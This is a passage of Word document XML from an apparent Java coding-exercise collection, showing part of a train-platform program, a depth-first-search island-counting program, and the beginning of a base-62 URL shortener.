    <w:p w14:paraId="0D8D8DE2" w14:textId="024C706A"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0A88C4E3" w14:textId="498153FF"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for</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j</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i </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1</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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> num</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j</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F6F62" w14:textId="2F4587BD" w:rsidR="00966D05" w:rsidRPr="00CE4B95" w:rsidRDefault="00966D05" w:rsidP="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p>
    <w:p w14:paraId="56710114" w14:textId="087EBF3E"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if</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arrival</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i</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gt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> arrival</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j</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amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> arrival</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i</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lt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> departure</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j</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48434D7B" w14:textId="3FA71934"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lastRenderedPageBreak/>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59005321" w14:textId="73314698"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7C8204F5" w14:textId="51948884"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23052165" w14:textId="4A6BBA75"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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>String</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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DED2DF" w14:textId="6EEA31BF"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C6ACF" w14:textId="00C109FA"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arrival</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1205</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1310</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0530</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0535</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0215</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA7112" w14:textId="08A86C4D"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departure</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1250</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1425</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0725</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0555</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0220</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0B2B4" w14:textId="404F8D75"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num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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B948446" w14:textId="46F28B6C"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System</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ou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println</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> required ar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getPlatformDetail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arrival</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departure</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num</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF50EB" w14:textId="0E48478B" w:rsidR="00966D05" w:rsidRPr="00CE4B9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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C78E6" w14:textId="21D4FBA5" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="_Toc196307838"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00535BED" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count number of island</w:t>
      </w:r>
      <w:r w:rsidR="001F7152" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a boolean 2D matrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>
    </w:p>
    <w:p w14:paraId="6213FEC8" w14:textId="77777777" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00C200DA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a Java program to count islands in a boolean 2D matrix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34222F33" w14:textId="0CBF7B13" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>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t>Input :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E798AA0" w14:textId="64313B15" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>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t>0 0 1 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7E076" w14:textId="5AFCD0C3" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>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t>0 0 1 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FADB86" w14:textId="7FB76D08" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>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t>1 0 0 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4502F" w14:textId="113A950F" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>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t>0 1 0 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4145173B" w14:textId="1A61D313" w:rsidR="00C200DA" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>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t>1 1 0 1 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6CD4C" w14:textId="1ABA4670" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00C200DA" w:rsidP="00C200DA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>3 connected island</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEA9DD" w14:textId="601930A4" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DF64E7"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ountIsland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C2EC7DC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B629DF"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ROW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p>
    <w:p w14:paraId="0C713FE2"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COL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p>
    <w:p w14:paraId="6FAC7BD8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717F6E5"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Directions for 8 possible neighbors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67788B"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owNb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05886609"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olNb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5CBF0C5C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849FBE4"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heck if cell is valid and safe to visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395124D5"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isSafe</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r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co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visite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8FED265"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row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amp;&amp;</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row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R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amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA76C8"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col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amp;&amp;</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col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CO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amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BCDDD"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amp;&amp;</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visite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l</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5971D"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7E308E2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD8754F"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Depth-First Search to mark connected 1's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A191BD0"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DF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r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co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visite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04CB250"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visite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ue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39615FEF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA287E"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Visit all 8 neighbors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E04D5B"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k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k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8</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9045EE6"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ewRow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ow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owNb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k</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B951EF"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ewCol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ol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olNb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k</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B88F006"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Saf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ewR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ewCo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visite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F6D0AD7"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DF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ewR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ewCo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visited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1545D344"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2C6A69B"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9F2460E"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E762DFA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE8DB7"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ain function to count islands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F5A4E"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countIsland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6D83E58"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visite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L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCB844"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96041D"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cou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2C28863B"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R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9B25A08"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j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j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CO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A349B28"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amp;&amp;</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visite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F31147E"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DF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visited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EBD9C6"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unt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0E5D04"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3113455C"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B58AB45"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3AF4F88"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AE99A"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count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47308094"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AC17A1F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B76AE42"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3080040"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4FE9522"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05ABF2D3"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308F4858"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03D71A96"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6E238BF6"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64BD414B"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B7ECDDC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC552D"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umber of islands is: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ountIsland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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C7A8A" w14:textId="77777777"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31B9598" w14:textId="30657622" w:rsidR="00535BED" w:rsidRPr="00CE4B95"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7986557B" w14:textId="77777777" w:rsidR="00535BED" w:rsidRPr="00CE4B95" w:rsidRDefault="00535BED" w:rsidP="00535BED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276E18A0" w14:textId="050DA2B9" w:rsidR="009A102A" w:rsidRPr="00CE4B95" w:rsidRDefault="009A102A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="_Toc196307839"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00C2785F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Shorten the given URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
    </w:p>
    <w:p w14:paraId="2152E27A" w14:textId="77777777" w:rsidR="00092ED7" w:rsidRPr="00CE4B95" w:rsidRDefault="009A102A" w:rsidP="00092ED7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00092ED7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to shorten the given URL?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B36AD8" w14:textId="102A881C" w:rsidR="009A102A" w:rsidRPr="00CE4B95" w:rsidRDefault="00092ED7" w:rsidP="00092ED7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Input: https://docs.google.com/document/d/1g1CwT8dhCGgjh1LtXSaRBZ1ctREqkldD76lAU4KxPOo/edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16CD91" w14:textId="7D142F69" w:rsidR="009A102A" w:rsidRPr="00CE4B95" w:rsidRDefault="009A102A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D7F2864"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D436A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63503776"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176C90AC"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UrlShorten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AF6D20E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E52613"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BASE_HOS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http://short.url/"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F26936"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CHAR_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bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB334E"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BAS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HAR_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p>
    <w:p w14:paraId="24AC0663"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767DCFA4"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keyToUrl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p>
    <w:p w14:paraId="5393B1F3"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urlToKey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p>
    <w:p w14:paraId="641E9C5B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05612A2D"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Function to encode URL to short key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9BAF06"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hortenUR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longUr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E967F9A"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rlToKey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ntainsKe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ongUr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EAA0BB1"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BASE_HOS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urlToKeyMap</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ongUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F497D"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002FF21"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0249BC"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hashCod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b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ongUr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hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3ACB5"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hortKe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ncodeToBase6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hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B955574"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFBF15E"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keyToUrl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hortKe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longUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67A620"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urlToKey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ongUr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hortKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CE095"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B208E7E"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BASE_HOS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hortKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0753DD"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32901D4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4737F2DD"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Function to decode key back to original URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486CE1C0"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expandUR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hortUr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41D57F2"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ke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hortUr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pla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ASE_HO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666600"/>
          <w:sz w:val="20"/>
